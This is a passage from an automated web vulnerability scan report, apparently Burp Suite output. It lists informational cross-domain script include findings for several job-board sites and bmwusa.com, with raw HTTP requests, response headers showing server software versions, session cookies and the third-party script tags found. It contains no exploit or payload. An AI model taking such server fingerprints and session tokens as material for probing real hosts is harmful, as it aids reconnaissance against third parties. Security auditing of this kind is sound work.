       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.18. http://www.attorneyresume.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.attorneyresume.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.attorneyresume.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:24 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=3oi3tsj2agglmdtggh0p0r2jo5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80394

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="SHORTCUT ICON" href="http://www.attorneyresume.com/faviconar.ico">
<titl
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
</table>
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
       </script>
...[SNIP]...

15.19. http://www.auditorcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.auditorcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.auditorcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=16al60hefdulh9nl41fvb7adh1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125427

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.20. http://www.automotivecrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.automotivecrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.automotivecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=chphkc8gns7vn2rq112ej1g8s5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109012

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.21. http://www.aviationcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aviationcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.aviationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:03 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5ito8gdqrme71tdpjpbd47goi6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 123144

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.22. http://www.bcgsearch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bcgsearch.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=f0h1k6bqv29tdb1vvdit6ua003; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31541

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<TITLE>Attorney Jobs, Law Jobs, Legal Jobs, Legal Recruiter, Legal Search Firm
...[SNIP]...
<br style="line-height:5px;"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

15.23. http://www.bilingualcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bilingualcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.bilingualcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:03 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3jv1797bk3m69qp27lbh4qrqj2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133153

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.24. http://www.biotechcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.biotechcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.biotechcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:05 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u6vsjargff90aq2r4fvrep9g90; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119741

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.25. http://www.bluecollarcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluecollarcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.bluecollarcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:36 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=phn4e0vehg11att6t127knugu0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:36 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149168

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.26. http://www.bmwactivatethefuture.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwactivatethefuture.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.bmwactivatethefuture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:52:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://content.bmwusa.com/microsite/bmwusaresources/javascript/swfobject.js"></script>
<script type="text/javascript" src="http://content.bmwusa.com/microsite/bmwusaresources/javascript/t47d_resources.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://code.jquery.com/jquery-latest.pack.js"></script>
...[SNIP]...
</a>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

15.27. http://www.bmwusa.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; NSC_CNX_21529_64.29.204.16=4f52b42b3660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:21:50 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; path=/; HttpOnly
Set-Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; expires=Mon, 21-Jan-3011 19:21:50 GMT; path=/
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:50 GMT;path=/
Content-Length: 206230


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...
</form>
<script language="javascript" type="text/javascript" defer="defer" src="http://group11.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_541.js"></script>
...[SNIP]...

15.28. http://www.bmwusa.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:18 GMT;path=/
Content-Length: 205829


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.29. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/1seriesconvertiblemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/128iconvertible/1seriesconvertiblemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/1/128iconvertible/1seriesconvertiblemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:43:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:03:52 GMT;path=/
Content-Length: 202165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.30. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/128iconvertible/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/1/128iconvertible/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
